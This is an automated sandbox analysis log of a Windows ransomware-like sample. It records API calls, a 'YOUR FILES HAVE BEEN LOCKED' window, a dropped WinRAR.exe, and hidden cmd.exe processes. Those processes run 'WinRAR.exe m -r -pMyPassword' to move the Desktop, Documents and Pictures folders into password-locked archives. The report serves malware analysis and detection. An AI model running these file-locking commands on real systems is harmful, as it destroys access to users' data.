Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720710 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 458788 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 84720750 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 262588 False 1
Fn
Environment Get Environment String name = UKKED False 3
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Wallpaper.png, type = file_attributes False 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, type = file_type True 2
Fn
File Write filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2276568 True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Create Desktop desktop_name = Hbchsbfgcd True 1
Fn
System Switch Desktop desktop_name = Hbchsbfgcd True 1
Fn
Environment Get Environment String name = UKKED False 5
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
Thread 0x95c
59 0
»
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 10889088 True 249
Fn
System Get Time type = Ticks, time = 10894361 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 66
Fn
Process #3: cmd.exe
63 0
»
Information Value
ID #3
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Desktop && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Desktop *
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:45, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
»
Information Value
PID 0x8d4
Parent PID 0x948 (c:\users\whuoxysd\appdata\local\temp\unnam3d.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 908
Threads
Thread 0x908
63 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
Fn
System Get Time type = Ticks, time = 10894501 True 1
Fn
System Get Time type = Performance Ctr, time = 12153315597 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a740000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769ca84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x769d3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x769b4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x769ca79d True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, os_pid = 0x340, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #4: cmd.exe
56 0
»
Information Value
ID #4
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Documents && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Documents *
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:45, Reason: Child Process
Unmonitor End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration 00:04:38
OS Process Information
»
Information Value
PID 0x8dc
Parent PID 0x948 (c:\users\whuoxysd\appdata\local\temp\unnam3d.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 20C
Threads
Thread 0x20c
56 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
Fn
System Get Time type = Ticks, time = 10894454 True 1
Fn
System Get Time type = Performance Ctr, time = 12149431321 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a740000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769ca84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x769d3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x769b4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x769ca79d True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\Documents, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Documents True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, os_pid = 0xa20, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Process #5: cmd.exe
63 0
»
Information Value
ID #5
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Pictures && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Pictures *
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:45, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
»
Information Value
PID 0x244
Parent PID 0x948 (c:\users\whuoxysd\appdata\local\temp\unnam3d.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 950
Threads
Thread 0x950
63 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
Fn
System Get Time type = Ticks, time = 10894532 True 1
Fn
System Get Time type = Performance Ctr, time = 12156766839 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a740000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769ca84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x769d3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x769b4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x769ca79d True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\Pictures, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Pictures True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, os_pid = 0x6ac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #6: winrar.exe
1833 0
»
Information Value
ID #6
File Name c:\users\whuoxysd\appdata\local\temp\winrar.exe
Command Line C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Desktop *
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:46, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
»
Information Value
PID 0x340
Parent PID 0x8d4 (c:\windows\syswow64\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 6A8
0x A58
0x 6DC
0x 530
0x AB8
0x B84
0x B7C
0x 9B0
0x B8C
0x 9AC
0x B28
0x 5E0
0x 1C4
0x 688
0x 238
0x B94
0x 4AC
0x 720
0x 9B8
0x BB4
0x BAC
0x BC0
0x BB0
0x B74
0x 9B4
0x B70
0x 704
0x 5D0
0x BE0
0x 374
0x 39C
0x A48
0x BE8
0x BEC
0x BE4
0x BDC
0x BD8
0x BD4
0x 74C
0x BD0
0x BCC
0x BC8
0x BC4
0x BF0
0x 6E4
0x B9C
0x BA0
0x 5B8
0x 634
0x BF8
0x B00
0x B04
0x 97C
0x 98C
0x 9FC
0x A0C
0x A1C
0x A2C
0x A3C
0x A54
0x A64
0x A74
0x A84
0x A94
0x AA4
0x AB4
0x AC4
0x AD4
0x AE4
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
Desktop.rar 8.42 MB MD5: f86ba5fef5fef6e7f3328faaa8aac027
SHA1: 9703bf05e525500ddc7680e0c6049eb2c8b28fa2
SHA256: 544bc424404caa14d14ed54e44213ece17bfd68128e93358e17fb52e30d19411
SSDeep: 196608:w8yCznar4brhLNAMf3uR0edxEjMLw60dQNI7hPr1xBG:wJCznarCZiMI5dGMAFlG 		False
...
Threads
Thread 0x6a8
1833 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 12514842502 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x77b03520 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x77b2b710 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c384f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x77b2b230 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c200b0 True 1
Fn
System Get Time type = Performance Ctr, time = 12518867803 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDllDirectoryW, address_out = 0x77b2d8c0 True 1
Fn
File Add Search Path - True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, base_address = 0x13f160000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Module Get Filename process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\WinRAR.ini, type = file_attributes False 1
Fn
